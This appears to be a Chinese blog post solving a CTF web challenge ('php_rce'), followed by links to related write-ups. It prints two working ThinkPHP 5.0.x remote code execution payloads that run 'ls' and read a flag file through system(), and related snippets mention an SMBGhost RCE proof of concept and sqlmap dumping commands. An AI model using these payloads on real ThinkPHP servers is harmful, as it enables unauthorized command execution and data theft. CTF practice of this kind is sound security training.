web_进阶_php_rce

最新推荐文章于 2022-06-07 22:15:18 发布
最新推荐文章于 2022-06-07 22:15:18 发布
阅读量108 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107858010
版权

参考的wp


网上很容易搜到thinkphp的payload,然后查询flag,拉到页面底部,看到ThinkPHP的版本是5.0.20:
回到CTF的这道题,应该考的就是这个命令执行的漏洞,执行ls命令
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

返回如下,再把index.php和router.php打开看了一下,木有发现flag,再把request和response也检查了下,也木有flag。。

再逐级查看上级目录,最终看到一个名为flag的文件:
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag

成功找到flag

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy_rce.py
10-11
phpstudy_rce
SMBGhost_RCE_PoC
03-18
SMBGhost_RCE_PoC CVE-2020-0796“ SMBGhost”的RCE PoC 仅用于演示目的!仅将此用作参考。严重地。这尚未在我的实验室环境之外行过测试。它写得很快,需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外...
【攻防世界 XCTF】 WEB 高手 php_rce ——最全面、最直观的WP
algae
05-04 690
攻防世界web高手php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 249
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界web高手php_rce,XCTF攻防世界_Web区001
weixin_39599654的博客
03-09 730
XCTF攻防世界_Web区001XCTF攻防世界_Web区001XCTF_Web_高手区baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界web高手php_rce,攻防世界_web高手_Training-WWW-Robots、php_rce
weixin_39530647的博客
03-09 69
Training-WWW-Robotsrobots协议是Python爬虫时涉及到的一个协议,在URL后直接加上/robots.txt,显示如下图: 然后如图所示把/robots.txt改成/f10g.php后得到flag:cyberpeace{dc7c764839800a9e351c917915b1e03e}php_rce 根据题目的writeup: 百度后可知5.1版本的thinkPHP漏洞为 ...
攻防世界Web “Web_php_unserialize、php_rce、Web_php_include”题解
qq_53325209的博客
04-06 2561
攻防世界高手区 Web “Web_php_unserialize、php_rce、Web_php_include”题解。
攻防世界web高手php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)
weixin_39637924的博客
03-09 367
题目今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。 解题过程去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈: 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:输入:http://your-ip:8080/index.php?s=/Inde...
攻防世界web高手php_rce,攻防世界 web高手区 1-5 2020.6.11
weixin_35962351的博客
03-09 259
前言继续ctf的旅程攻防世界web高手区的1-5题1、baby_web去是个1.php页面里只有helloworld按题意是说想看初始网页猜测有index.php结果直接跳转到1.php查看源码在index的请求头里发现flag2、Training-WWW-Robots这题不就是个robots嘛没什么好说的了入robots.txt发现php入php发现flag3、Web_python_t...
攻防世界web高手php_rce,[CTF]攻防世界web高手区Writeup(更行ing)
weixin_42531396的博客
03-09 150
baby_webEMMMM,这就是一个签到题~解题方法:F12→Networks→刷新抓包→完成Training-WWW-Robots看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识打开网页,果然~他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the con...
攻防世界WEB高手区unserialize3,Web_php_unserialize,php_rce
不知名白帽的博客
06-07 1394
攻防世界高手区。unserialize3,Web_php_unserialize,php_rce
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度行分类
RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络
09-23
在IT领域,特别是机器学习和神经网络模型设计中,“RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络”这个标题所涵盖的知识点非常丰富。首先,我们要了解RCE网络,全称为“衰减库仑势”(Radiation-charge exchange...
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
[攻防世界web]shrine
JURUO222的博客
07-31 432
参考文章1 参考文章2 SSTI(服务器模板注入) sql注入是从用户获得一个输入,然后又后端脚本语言行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornad
web__Web_python_template_injection
JURUO222的博客
08-08 355
参考文章 #flask模板注入 flask的渲染方法有render_template和render_template_string两种。 render_template()是用来渲染一个指定的文件的。使用如下 return render_template(‘index.html’) render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。 使用方法如下 html = ‘This is index page’ return render_template_strin
web__NewsCenter
JURUO222的博客
08-07 328
可以通过sqlmap来爆破 在框中随便输入一个test,然后用burp抓包 将抓到的数据保存在1.txt里,用sqlmap行爆破 Python sqlmap.py -r 1.txt --dbs 爆出数据库名 继续查询数据库news Python  sqlmap.py -r 1.txt -D news --dump ...
HCTF2018-admin
JURUO222的博客
04-02 307
参考大佬博客 这道题叫admin,一去有登录和注册选项,可能是在暗示用admin登录 随便注册一个登录 发现源码 andmin登录成功便可获得flag flask session 伪造 flask数据库操作的框架,就只能将session存储在cookie中。因为cookie实际上是存储在客户端(浏览器)中的,所以称之为“客户端session”。 flask 新建了URLSafeTimed...
攻防世界php_rce
最新发布
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值